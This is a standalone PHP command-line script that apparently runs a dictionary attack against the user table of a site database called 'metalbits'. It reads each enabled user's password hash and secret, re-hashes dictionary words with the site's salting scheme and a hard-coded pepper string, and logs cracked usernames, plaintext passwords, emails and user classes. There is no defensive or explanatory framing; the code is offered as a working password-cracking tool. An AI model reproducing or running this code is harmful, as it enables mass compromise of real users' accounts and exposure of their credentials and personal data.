bruteforce.phps
#!/usr/bin/php5
<?php
// return sha1(md5($Secret).$Str.sha1($Secret).';Sgv(dTUf&e9+eJrMx(.eL=;Xbf[mSD}');
//
$start = $steptime = time();
set_time_limit(0);
ini_set(memory_limit, '100M');
mysql_connect('localhost', '','');
mysql_select_db('metalbits');
// Start at word #
if(ctype_digit($argv[1])) {
$step = $argv[1];
} else { $step = 0; }
// Fetch # words at a time
if(ctype_digit($argv[2])) {
$chunk = $argv[2];
} else { $chunk = 1000; }
$users = array();
$res = mysql_query('SELECT username, passhash, secret, email, class FROM users_main WHERE enabled="1"') or die(mysql_error());
while($row = mysql_fetch_assoc($res)) {
$users[] = $row;
}
mysql_free_result($res);
$collected = count($users);
echo "Users collected: $collected\n";
mysql_select_db('dictionary');
$words = join('',mysql_fetch_row(mysql_query('SELECT COUNT(*) FROM md5')));
while($step <= $words) {
$wordlist = array();
$limit = ' LIMIT '.$step.','.$chunk;
$res = mysql_query('SELECT str FROM md5'.$limit) or die(mysql_error());
while($row=mysql_fetch_row($res)) {
$wordlist[] = join('',$row);
}
$prog = round((($step/$words)*100),2);
$chunks = (($words - $step) / $chunk); // Total amount of wordlist chunks left
$timeleft = (time()-$steptime)*$chunks;
$eta = time_diff(time(), time()+$timeleft, 2);
$steptime = time();
echo "Fetched words $step to ".($step+$chunk)." of $words, got: ".count($wordlist)." - progress($prog%) users left(".count($users).") eta($eta)\n";
foreach($wordlist as $word) {
for($u=0, $size = sizeof($users); $u < $size; ++$u) {
$user = $users[$u];
if($user['passhash'] == sha1(md5($user['secret']).$word.sha1($user['secret']).';Sgv(dTUf&e9+eJrMx(.eL=;Xbf[mSD}')) {
writeLog("User: $user[username] Pass: $word Email: $user[email] Class: $user[class]");
unset($users[$u]);
}
}
}
$step = $step + $chunk;
unset($wordlist);
}
function writeLog($str, $type='both') {
if($type=='both' || $type=='file') {
$fd = fopen('bruteforce.log','a');
fwrite($fd, $str."\n");
fclose($fd);
}
if($type=='both') {
echo "$str\n";
}
}
function time_diff($PastTime,$FutureTime='',$Levels=2, $ShowAgo = false, $ShowSeconds = false, $Time = 0) {
if(date('Y-m-d H:i:s', $PastTime) == '1999-11-30 00:00:00') {
return 'Never';
}
if($FutureTime == '') { $FutureTime = time(); }
if($FutureTime<$PastTime) {
return false;
}
if(!$Time) {
$Time=$FutureTime-$PastTime;
}
$Years=floor($Time/31556926); // seconds in a year
$Remain = $Time - $Years*31556926;
$Months = floor($Remain/2629744); // seconds in a month
$Remain = $Remain - $Months*2629744;
$Weeks = floor($Remain/604800); // seconds in a week
$Remain = $Remain - $Weeks*604800;
$Days = floor($Remain/86400); // seconds in a day
$Remain = $Remain - $Days*86400;
$Hours=floor($Remain/3600);
$Remain = $Remain - $Hours*3600;
$Minutes=floor($Remain/60);
$Remain = $Remain - $Minutes*60;
$Seconds=$Remain;
$Return = '';
if ($Years>0 && $Levels>0) {
$Return.=$Years.'Y';
//if ($Years>1) { $Return.='s'; }
$Levels--;
}
if ($Months>0 && $Levels>0) {
//if ($Return!='') { $Return.=', '; }
$Return.=$Months.'M';
//if ($Months>1) { $Return.='s'; }
$Levels--;
}
if ($Weeks>0 && $Levels>0) {
//if ($Return!="") { $Return.=', '; }
$Return.=$Weeks.'w';
//if ($Weeks>1) { $Return.='s'; }
$Levels--;
}
if ($Days>0 && $Levels>0) {
//if ($Return!='') { $Return.=', '; }
$Return.=$Days.'d';
//if ($Days>1) { $Return.='s'; }
$Levels--;
}
if ($Hours>0 && $Levels>0) {
//if ($Return!='') { $Return.=', '; }
$Return.=$Hours.'h';
//if ($Hours>1) { $Return.='s'; }
$Levels--;
}
if ($Minutes>0 && $Levels>0) {
//if ($Return!='') { $Return.=' and '; }
$Return.=$Minutes.'m';
//if ($Minutes>1) { $Return.='s'; }
$Levels--;
}
if($ShowSeconds && $Seconds>0 && $Levels>0) {
//if ($Return!='') { $Return.=' and '; }
$Return.=$Seconds.'s';
//if ($Seconds>1) { $Return.='s'; }
$Levels--;
}
if($Return == '') {
$Return = 'N/A';
} elseif($ShowAgo) {
//$Return.=' ago';
}
return $Return;
}
?>